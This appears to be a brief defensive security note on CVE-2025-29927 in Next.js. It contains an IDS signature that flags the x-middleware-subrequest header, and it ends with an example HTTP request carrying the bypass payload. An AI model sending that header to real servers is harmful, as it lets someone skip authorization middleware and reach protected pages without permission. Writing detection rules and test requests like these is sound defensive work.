In reference to CVE-2025-29927:
alert http any any -> $HTTP_SERVERS any (msg: "ET WEB_SERVER Next.js CVE-2025-29927 middleware bypass attempt"; flow: established, to_server; http.header_names; content: "|0d 0a|x-middleware-subrequest|0d 0a|"; nocase; reference:url,nextjs.org/blog/cve-2025-29927; reference:cve,2025-29927; metadata: attack_target Web_Server, deployment Datacenter, signature_severity Major, tag NextJS, affected_product NextJS_15_2_2, cve CVE_2025_29927, created_at 2025_03_23; classtype: web-application-attack; sid: 1; rev: 1;)
Example request using PoC:
GET /dashboard HTTP/1.1
Host: localhost:3000
User-Agent: curl/8.10.1
Accept: */*
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware